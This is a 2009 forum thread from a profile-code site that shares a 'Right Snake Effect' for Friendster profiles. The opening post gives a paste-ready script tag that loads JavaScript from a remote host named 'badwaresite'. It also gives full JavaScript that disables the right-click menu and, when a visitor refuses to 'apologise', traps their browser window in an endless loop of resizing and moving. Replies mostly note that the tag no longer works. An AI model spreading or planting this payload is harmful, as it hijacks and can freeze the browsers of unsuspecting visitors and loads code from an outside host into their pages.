Dynamic Profile Codes
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Right Snake Effect

5 posters

Go down

Right Snake Effect Empty Right Snake Effect

Post by lovebang01 Mon Oct 26, 2009 3:20 pm

If you dont know anything about JS here's a ready to paste code for you

Code:
<script src="http://h1.badwaresite.www/jirohidaka/snake.js"></script>

PASTE IT TO YER ABOUT ME OR WHO I WANT TO MEET SECTION


REPLY IF YER GONNA USE IT!


BUT IF YOU ALREADY HAVE A JS FILE COMPILE THIS..



Code:
function stopSnake(){
sorry=confirm("If you admit you're sorry, just click OK to stop the script. If you are hard-headed, press CANCEL.")
if(sorry){
alert("Just don't do that again, ok?")
}
else{
alert("Here we go!!!")
clickSnake()
}
return false
}
function clickSnake(){
scrW=screen.availWidth
scrH=screen.availHeight
window.resizeTo(10,10)
window.focus()
for(a=0;a<80;a++){
window.moveTo(0,0)
window.resizeTo(0,scrH*a/80)
}
window.resizeTo(0,0)
for(b=0;b<80;b++){
window.moveTo(0,scrH/1)
window.resizeTo(scrW*b/80,0)
}
window.resizeTo(0,0)
for(c=0;c<80;c++){
window.moveTo(scrW/1,scrH/1)
window.resizeTo(0,scrH*c/80)
}
window.resizeTo(0,0)
for(d=0;d<80;d++){
window.moveTo(scrW/1,0)
window.resizeTo(scrW*d/80,0)
}
clickSnake()
return false
}
document.oncontextmenu=stopSnake;
lovebang01
lovebang01
DPC Addict

Male
Posts : 166
Age : 31
Joined date : 2009-10-26
Location : Bacolod City
Cash : 26743

http://friendster.com/admerbakud

Back to top Go down

Right Snake Effect Empty Re: Right Snake Effect

Post by Marz Tue Oct 27, 2009 11:10 pm

Code:
<script src="http://h1.badwaresite.www/jirohidaka/snake.js"></script>

script tag is not working anymore in Fs.
Marz
Marz
DPC Whiz

Male
Posts : 2030
Joined date : 2009-10-17
Location : .
Cash : 242450441

Back to top Go down

Right Snake Effect Empty Re: Right Snake Effect

Post by StarApple. Ü Tue Oct 27, 2009 11:15 pm

is this from Baklang Forum??
StarApple. Ü
StarApple. Ü
DPC Super Member

Female
Posts : 7274
Age : 88
Joined date : 2009-10-12
Location : Outside the box.
Cash : 30059

http://tellmeyourloveproblems.tumblr.com

Back to top Go down

Right Snake Effect Empty Re: Right Snake Effect

Post by Энджелл Виллем де Sun Nov 15, 2009 1:57 am

strike 4...
Энджелл Виллем де
Энджелл Виллем де
Guest

Male
Posts : 5
Age : 113
Joined date : 2009-11-14
Location :
Cash : 26440

Back to top Go down

Right Snake Effect Empty Re: Right Snake Effect

Post by danielvicedo Tue Dec 08, 2009 12:01 am

hmmm . That one's cool .

But , yea , marz' right . It doesn't work anymore in friendster (the linker)

Btw, thanks.
danielvicedo
danielvicedo
DPC Freak

Male
Posts : 1078
Age : 29
Joined date : 2009-10-16
Location : under my bebe's bed. :)
Cash : 27318

http://danielvicedo.tk

Back to top Go down

Right Snake Effect Empty Re: Right Snake Effect

Post by Sponsored content


Sponsored content


Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum